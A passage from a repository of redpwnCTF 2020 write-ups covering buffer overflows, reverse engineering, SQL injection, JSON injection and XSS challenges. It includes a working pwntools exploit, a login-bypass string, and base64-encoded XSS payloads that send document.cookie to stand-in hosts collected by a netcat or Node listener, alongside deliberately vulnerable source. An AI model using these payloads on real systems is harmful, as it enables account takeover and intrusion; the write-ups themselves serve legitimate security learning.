NULL); 12 | 13 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 14 | puts("What do you want to fill your coffer with?"); 15 | 16 | gets(name); 17 | 18 | if(code == 0xcafebabe) { 19 | system("/bin/sh"); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-2/README.md: -------------------------------------------------------------------------------- 1 | # coffer-overflow-2 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge. 6 | 7 | # Requirements 8 | 9 | - Basic Buffer overflow. 10 | 11 | # Source 12 | 13 | - [coffer-overflow-2](./coffer-overflow-2). 14 | 15 | ``` 16 | You'll have to jump to a function now!? 17 | 18 | nc 2020.redpwnc.tf 31908 19 | ``` 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main(void) 26 | { 27 | char name[16]; 28 | 29 | setbuf(stdout, NULL); 30 | setbuf(stdin, NULL); 31 | setbuf(stderr, NULL); 32 | 33 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 34 | puts("What do you want to fill your coffer with?"); 35 | 36 | gets(name); 37 | } 38 | 39 | void binFunction() { 40 | system("/bin/sh"); 41 | } 42 | ``` 43 | 44 | # Exploitation 45 | 46 | Check out [coffer-overflow-1](../coffer-overflow-1) for some details. You can checkout how buffer overflow works [here](https://github.com/csivitu/Incore-Sessions/blob/master/Buffer%20Overflow/Session-1.md). 47 |
48 | 49 | Here, we basically need to overwrite the return pointer from `main` so that it returns to `binFunction`. We know, main has a stack of size 16. You can get the address of `binFunction` using `gdb` or `objdump`. 50 | 51 | ``` 52 | $ objdump -d coffer-overflow-2 | grep binFunction 53 | 00000000004006e6 : 54 | ``` 55 | 56 | Now, write this address in little endian over the return pointer of main. That is, 16 random characters, 8 more to overwrite the `saved rbp`, and the address to overwrite the `saved rip`. 57 | 58 | ```python 59 | import pwn 60 | 61 | r = pwn.remote('2020.redpwnc.tf', 31908) 62 | 63 | rep = b'a'*16 + b'b'*8 + pwn.p64(0x004006e6) 64 | print(rep) 65 | r.sendline(rep) 66 | r.interactive() 67 | ``` 68 | 69 | Run this using `python`. 70 | 71 | ```bash 72 | $ python cof2.py 73 | [+] Opening connection to 2020.redpwnc.tf on port 31908: Done 74 | b'aaaaaaaaaaaaaaaabbbbbbbb\xe6\x06@\x00\x00\x00\x00\x00' 75 | [*] Switching to interactive mode 76 | Welcome to coffer overflow, where our coffers are overfilling with bytes ;) 77 | What do you want to fill your coffer with? 78 | $ ls 79 | Makefile 80 | bin 81 | coffer-overflow-2 82 | coffer-overflow-2.c 83 | dev 84 | flag.txt 85 | lib 86 | lib32 87 | lib64 88 | $ cat flag.txt 89 | flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n} 90 | ``` 91 | 92 | The flag is: 93 | 94 | ``` 95 | flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n} 96 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-2/coffer-overflow-2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/pwn/coffer-overflow-2/coffer-overflow-2 -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-2/coffer-overflow-2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | char name[16]; 7 | 8 | setbuf(stdout, NULL); 9 | setbuf(stdin, NULL); 10 | setbuf(stderr, NULL); 11 | 12 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 13 | puts("What do you want to fill your coffer with?"); 14 | 15 | gets(name); 16 | } 17 | 18 | void binFunction() { 19 | system("/bin/sh"); 20 | } 21 | 22 | -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/bubbly/README.md: -------------------------------------------------------------------------------- 1 | # bubbly 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | A possible way to solve this challenge is decompiling the binary and trying to understand what's happening in the code. 6 | 7 | # Requirements 8 | 9 | - ghidra 10 | - gdb 11 | 12 | # Source 13 | 14 | - [bubbly](./bubbly). 15 | 16 | # Exploitation 17 | 18 | First, we checkout the decompiled version of this binary with the help of `ghidra`. 19 |
20 | 21 | disas main 22 | 23 | As you see in the code, there is a `while(true)` loop which reads a number `%d` from `stdin` and stores it in `i`. There's also an array of numbers `nums`. The code snippet containing `nums` is basically swapping `nums[i]` with `nums[i+1]`. The `check` function basically checks if the list is sorted. 24 |
25 | 26 | ```c 27 | _Bool check(void) 28 | 29 | { 30 | uint32_t i; 31 | _Bool pass; 32 | 33 | i = 0; 34 | while( true ) { 35 | if (8 < i) { 36 | return true; 37 | } 38 | if (nums[i + 1] < nums[i]) break; 39 | i = i + 1; 40 | } 41 | return false; 42 | } 43 | ``` 44 | 45 | The target is to keep swapping indices in `nums` to finally sort it as a list. So, we open gdb and find out what nums is. 46 | 47 | ```bash 48 | gdb-peda$ print nums 49 | $1 = {0x1, 0xa, 0x3, 0x2, 0x5, 0x9, 0x8, 0x7, 0x4, 0x6} 50 | ``` 51 | 52 | When you execute this line in `gdb`, you see that `nums` is a global array, consisting of numbers from 1 to 10. It is also important to notice in the `ghidra` decompiled code that the value of `i` entered by the user must be `<=8`, otherwise it will just break out of the `while(true)` loop. 53 |
54 | 55 | Now, we have to device a strategy to sort these numbers by swapping indices `i` and `i+1` in `nums`. So, first we try to bring `0x2` or `2` to it's real place by passing `2` followed by `1`. That swaps the indices `2 with 3` and then `1 with 2`, bringing 2 back to it's original place. We can perform these swaps in `gdb` and keep checking the outputs of the swaps as we move on. Here's a list of swaps that could sort the array. 56 | 57 | ``` 58 | 2 59 | 1 60 | 2 61 | 7 62 | 6 63 | 5 64 | 4 65 | 3 66 | 4 67 | 8 68 | 7 69 | 6 70 | 5 71 | 8 72 | 7 73 | 6 74 | 8 75 | 7 76 | 8 77 | 9 78 | ``` 79 | 80 | At the end of every iteration, the `check` function runs to check if the list is sorted. Once it's sorted, we can break out of the loop, since `pass` is now equal to `true`. 81 |
82 | 83 | The list ends with a `9` so that we can break out of the `while` loop. Once it breaks out, it checks if the value of `pass` is `true`, which it is, and then it runs the `print_flag` function. Passing the numbers in the above list fetches us the flag. 84 | 85 | ```bash 86 | $ nc 2020.redpwnc.tf 31039 87 | I hate my data structures class! Why can't I just sort by hand? 88 | 2 89 | 1 90 | 2 91 | 7 92 | 6 93 | 5 94 | 4 95 | 3 96 | 4 97 | 8 98 | 7 99 | 6 100 | 5 101 | 8 102 | 7 103 | 6 104 | 8 105 | 7 106 | 8 107 | 9 108 | Well done! 109 | flag{4ft3r_y0u_put_u54c0_0n_y0ur_c011ege_4pp5_y0u_5t1ll_h4ve_t0_d0_th15_57uff} 110 | ``` 111 | 112 | The flag is: 113 | 114 | ``` 115 | flag{4ft3r_y0u_put_u54c0_0n_y0ur_c011ege_4pp5_y0u_5t1ll_h4ve_t0_d0_th15_57uff} 116 | ``` 117 | -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/bubbly/bubbly: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/rev/bubbly/bubbly -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/bubbly/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/rev/bubbly/static/img1.png -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/ropes/README.md: -------------------------------------------------------------------------------- 1 | # ropes 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This can be solved using `strings` in Linux. 6 | 7 | # Requirements 8 | 9 | - `strings` command 10 | 11 | # Source 12 | 13 | - [ropes](./ropes) 14 | - [ropes (official)](https://redpwn.storage.googleapis.com/uploads/b896a5f99065a7df18d6ab3c6296c79f51f73ab0de3466944e08cbd2be4953fb/ropes) 15 | 16 | # Exploitation 17 | 18 | Run `strings` on the file to get the strings in the binary. 19 | 20 | ```bash 21 | $ strings ropes 22 | __PAGEZERO 23 | __TEXT 24 | __text 25 | __TEXT 26 | __stubs 27 | __TEXT 28 | __stub_helper 29 | __TEXT 30 | __cstring 31 | __TEXT 32 | __unwind_info 33 | __TEXT 34 | __DATA 35 | __nl_symbol_ptr 36 | __DATA 37 | __la_symbol_ptr 38 | __DATA 39 | __LINKEDIT 40 | /usr/lib/dyld 41 | /usr/lib/libSystem.B.dylib 42 | Give me a magic number: 43 | First part is: flag{r0pes_ar3_ 44 | Second part is: just_l0ng_str1ngs} 45 | @dyld_stub_binder 46 | @_printf 47 | @_puts 48 | @_scanf 49 | _mh_execute_header 50 | !main 51 | __mh_execute_header 52 | _main 53 | _printf 54 | _puts 55 | _scanf 56 | dyld_stub_binder 57 | ``` 58 | 59 | You can see there are 2 lines which contain the flag. 60 | 61 | ``` 62 | First part is: flag{r0pes_ar3_ 63 | Second part is: just_l0ng_str1ngs} 64 | ``` 65 | 66 | The flag is: 67 | 68 | ``` 69 | flag{r0pes_ar3_just_l0ng_str1ngs} -------------------------------------------------------------------------------- /redpwnCTF 2020/rev/ropes/ropes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/rev/ropes/ropes -------------------------------------------------------------------------------- /redpwnCTF 2020/web/inspector-general/README.md: -------------------------------------------------------------------------------- 1 | # inspector-general 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Basic source code challenge. 6 | 7 | # Requirements 8 | 9 | - Viewing source of HTML 10 | 11 | # Source 12 | 13 | - https://redpwn.net/ 14 | 15 | # Exploitation 16 | 17 | Press `Ctrl + U` on your browser to view the source code of the `HTML` file. Search for `flag{...}`. 18 | 19 | ```html 20 | 21 | ``` 22 | 23 | The flag is: 24 | 25 | ``` 26 | flag{1nspector_g3n3ral_at_w0rk} 27 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/login/README.md: -------------------------------------------------------------------------------- 1 | # login 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Basic SQL Injection. 6 | 7 | # Requirements 8 | 9 | - Basic knowledge of SQL Injection. 10 | 11 | # Source 12 | 13 | - https://login.2020.redpwnc.tf/ 14 | 15 | # Exploitation 16 | 17 | This is a beginner SQL Injection challenge. Just pass the username and the password as `' or 1=1 -- `, it will return the flag in an `alert`. 18 | 19 | disas main 20 | 21 | The flag is: 22 | 23 | ``` 24 | flag{0bl1g4t0ry_5ql1} 25 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/login/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/web/login/static/img1.png -------------------------------------------------------------------------------- /redpwnCTF 2020/web/panda-facts/README.md: -------------------------------------------------------------------------------- 1 | # panda-facts 2 | 3 | Authors: [roerohan](https://github.com/roerohan), [thebongy](https://github.com/thebongy) 4 | 5 | Maybe we can call this JSON injection? 6 | 7 | # Requirements 8 | 9 | - Basic knowledge of Node.js. 10 | 11 | # Source 12 | 13 | - [index.js](./index.js) 14 | - https://panda-facts.2020.redpwnc.tf/ 15 | 16 | # Exploitation 17 | 18 | ```javascript 19 | async function generateToken(username) { 20 | const algorithm = 'aes-192-cbc'; 21 | const key = Buffer.from(process.env.KEY, 'hex'); 22 | // Predictable IV doesn't matter here 23 | const iv = Buffer.alloc(16, 0); 24 | 25 | const cipher = crypto.createCipheriv(algorithm, key, iv); 26 | 27 | const token = `{"integrity":"${INTEGRITY}","member":0,"username":"${username}"}` 28 | 29 | let encrypted = ''; 30 | encrypted += cipher.update(token, 'utf8', 'base64'); 31 | encrypted += cipher.final('base64'); 32 | return encrypted; 33 | } 34 | ``` 35 | 36 | You really just need to notice this function. Notice, the token is not created like `token.username = username`. It's formed in the following way: 37 | 38 | ``` 39 | const token = `{"integrity":"${INTEGRITY}","member":0,"username":"${username}"}` 40 | ``` 41 | 42 | This allows us to close the `"` with the help of the string we pass, and set member to a non-zero value. 43 |
44 | 45 | We can just pass the username as `","member":"1` and the visit `/api/flag`. 46 | 47 | ``` 48 | { 49 | "success": true, 50 | "flag": "flag{1_c4nt_f1nd_4_g00d_p4nd4_pun}" 51 | } 52 | ``` 53 | 54 | The flag is: 55 | 56 | ``` 57 | flag{1_c4nt_f1nd_4_g00d_p4nd4_pun} 58 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/static-pastebin/README.md: -------------------------------------------------------------------------------- 1 | # static-pastebin 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This challenge uses XSS to get the flag from the `admin bot's` cookies. 6 | 7 | # Requirements 8 | 9 | - Basic Knowledge of XSS. 10 | - A web server where you can accept a request. 11 | 12 | # Source 13 | 14 | - https://static-pastebin.2020.redpwnc.tf/ 15 | 16 | # Exploitation 17 | 18 | First, try a random `

Hello

` tag to see if you can put HTML in your pastebin. You can see the `js` file in the page: 19 | 20 | ```javascript 21 | (async () => { 22 | await new Promise((resolve) => { 23 | window.addEventListener('load', resolve); 24 | }); 25 | 26 | const content = window.location.hash.substring(1); 27 | display(atob(content)); 28 | })(); 29 | 30 | function display(input) { 31 | document.getElementById('paste').innerHTML = clean(input); 32 | } 33 | 34 | function clean(input) { 35 | let brackets = 0; 36 | let result = ''; 37 | for (let i = 0; i < input.length; i++) { 38 | const current = input.charAt(i); 39 | if (current == '<') { 40 | brackets ++; 41 | } 42 | if (brackets == 0) { 43 | result += current; 44 | } 45 | if (current == '>') { 46 | brackets --; 47 | } 48 | } 49 | return result 50 | } 51 | ``` 52 | 53 | We can infer 2 things from this. 54 | 55 | - The content of the page is obtained from the URL, which is a base64 encoded form of the text you entered. 56 | - The `clean` function will not allow writing of text if bracket pairs do not match. 57 | 58 | It is rather easy to break this clean function, by adding an extra `>` at the starting of your XSS script. Here's the payload: 59 | 60 | ``` 61 | > 62 | ``` 63 | 64 | Your payload has the following URL: 65 | 66 | ``` 67 | https://static-pastebin.2020.redpwnc.tf/paste/#PjxpbWcgc3JjPTEgaHJlZj0xIG9uZXJyb3I9ImphdmFzY3JpcHQ6ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9pcDpwb3J0P2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSI+PC9pbWc+ 68 | ``` 69 | 70 | You can simply set up a `netcat listener` using `nc -l port` on your server, and pass the link to the `Admin Bot` [here](https://admin-bot.redpwnc.tf/submit?challenge=static-pastebin&url=https%3A%2F%2Fstatic-pastebin.2020.redpwnc.tf%2Fpaste%2F%23PjxpbWcgc3JjPTEgaHJlZj0xIG9uZXJyb3I9ImphdmFzY3JpcHQ6ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9jc2l2aXQuY29tOjkwMDE%2FY29va2llPScrZG9jdW1lbnQuY29va2llIj48L2ltZz4%3D&message=The%20admin%20has%20visited%20your%20URL.). The admin bot is basically a headless chrome browser which has the flag in it's cookies. When it visits your site, the XSS steals the cookies from the admin bot and sends it to your server. You get a request which looks like: 71 | 72 | ``` 73 | GET /?cookie=flag=flag{54n1t1z4t10n_k1nd4_h4rd} HTTP/1.1 74 | Host: ip:port 75 | Connection: keep-alive 76 | Upgrade-Insecure-Requests: 1 77 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/83.0.4103.0 Safari/537.36 78 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 79 | Accept-Encoding: gzip, deflate 80 | ``` 81 | 82 | The flag is: 83 | 84 | ``` 85 | flag{54n1t1z4t10n_k1nd4_h4rd} 86 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/static-static-hosting/README.md: -------------------------------------------------------------------------------- 1 | # static-static-hosting 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is another XSS challenge, similar to [this](../static-pastebin) one. 6 | 7 | # Requirements 8 | 9 | - Basic knowledge of XSS. 10 | - Server with SSL to accept a request. 11 | 12 | # Source 13 | 14 | - https://static-static-hosting.2020.redpwnc.tf/ 15 | 16 | # Exploitation 17 | 18 | This site allows you to write HTML, so it's basically shouting at you to perform an XSS attack. Similar to [static-pastebin](../static-pastebin), the URL of the webpage created actually consists a base64 encoded form of the content of the page. We can see the `js` in the source. 19 | 20 | ```javascript 21 | (async () => { 22 | await new Promise((resolve) => { 23 | window.addEventListener('load', resolve); 24 | }); 25 | 26 | const content = window.location.hash.substring(1); 27 | display(atob(content)); 28 | })(); 29 | 30 | function display(input) { 31 | document.documentElement.innerHTML = clean(input); 32 | } 33 | 34 | function clean(input) { 35 | const template = document.createElement('template'); 36 | const html = document.createElement('html'); 37 | template.content.appendChild(html); 38 | html.innerHTML = input; 39 | 40 | sanitize(html); 41 | 42 | const result = html.innerHTML; 43 | return result; 44 | } 45 | 46 | function sanitize(element) { 47 | const attributes = element.getAttributeNames(); 48 | for (let i = 0; i < attributes.length; i++) { 49 | // Let people add images and styles 50 | if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) { 51 | element.removeAttribute(attributes[i]); 52 | } 53 | } 54 | 55 | const children = element.children; 56 | for (let i = 0; i < children.length; i++) { 57 | if (children[i].nodeName === 'SCRIPT') { 58 | element.removeChild(children[i]); 59 | i --; 60 | } else { 61 | sanitize(children[i]); 62 | } 63 | } 64 | } 65 | ``` 66 | 67 | The main thing we notice is that it prevents `script` tags and it allows only the following attributes for an element: `'src', 'width', 'height', 'alt', 'class'`. So we have to perform an XSS with these attributes. So, here's the payload. 68 | 69 | ``` 70 | 71 | ```` 72 | 73 | Note that here, the site is supposed to be `https`, otherwise there will be a Content Security Policy Bypass (CSP Bypass) error, and the request won't be sent. We can get the URL of the resulting webpage: 74 | 75 | ``` 76 | https://static-static-hosting.2020.redpwnc.tf/site/#PGlmcmFtZSBzcmM9ImphdmFzY3JpcHQ6ZG9jdW1lbnQubG9jYXRpb249J2h0dHBzOi8vbXlzZXJ2ZXIudGxkP2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSI+PC9pZnJhbWU+ 77 | ``` 78 | 79 | On the server, we can create a simple Node.js backend which accepts the cookie as a query param and logs it. 80 | 81 | ```javascript 82 | router.get('/cookie', (req, res) => { 83 | console.log(req.query.cookie); 84 | } 85 | ``` 86 | 87 | When the link for the website is sent to the `admin bot`, which is basically a headless chrome browser, it visits the page and it's cookie is stolen and sent to the server at `myserver.tld`. The cookie stores the `flag`. 88 |
89 | 90 | The flag is: 91 | 92 | ``` 93 | flag{wh0_n33d5_d0mpur1fy} 94 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/web/tux-fanpage/index.js: -------------------------------------------------------------------------------- 1 | const express = require('express') 2 | const path = require('path') 3 | const app = express() 4 | 5 | //Don't forget to redact from published source 6 | const flag = '[REDACTED]' 7 | 8 | app.get('/', (req, res) => { 9 | res.redirect('/page?path=index.html') 10 | }) 11 | 12 | app.get('/page', (req, res) => { 13 | 14 | let path = req.query.path 15 | 16 | //Handle queryless request 17 | if(!path || !strip(path)){ 18 | res.redirect('/page?path=index.html') 19 | return 20 | } 21 | path = strip(path) 22 | 23 | path = preventTraversal(path) 24 | 25 | res.sendFile(prepare(path), (err) => { 26 | if(err){ 27 | if (! res.headersSent) { 28 | try { 29 | res.send(strip(req.query.path) + ' not found') 30 | } catch { 31 | res.end() 32 | } 33 | } 34 | } 35 | }) 36 | }) 37 | 38 | //Prevent directory traversal attack 39 | function preventTraversal(dir){ 40 | if(dir.includes('../')){ 41 | let res = dir.replace('../', '') 42 | return preventTraversal(res) 43 | } 44 | 45 | //In case people want to test locally on windows 46 | if(dir.includes('..\\')){ 47 | let res = dir.replace('..\\', '') 48 | return preventTraversal(res) 49 | } 50 | return dir 51 | } 52 | 53 | //Get absolute path from relative path 54 | function prepare(dir){ 55 | return path.resolve('./public/' + dir) 56 | } 57 | 58 | //Strip leading characters 59 | function strip(dir){ 60 | const regex = /^[a-z0-9]$/im 61 | 62 | //Remove first character if not alphanumeric 63 | if(!regex.test(dir[0])){ 64 | if(dir.length > 0){ 65 | return strip(dir.slice(1)) 66 | } 67 | return '' 68 | } 69 | 70 | return dir 71 | } 72 | 73 | app.listen(3000, () => { 74 | console.log('listening on 0.0.0.0:3000') 75 | }) 76 | --------------------------------------------------------------------------------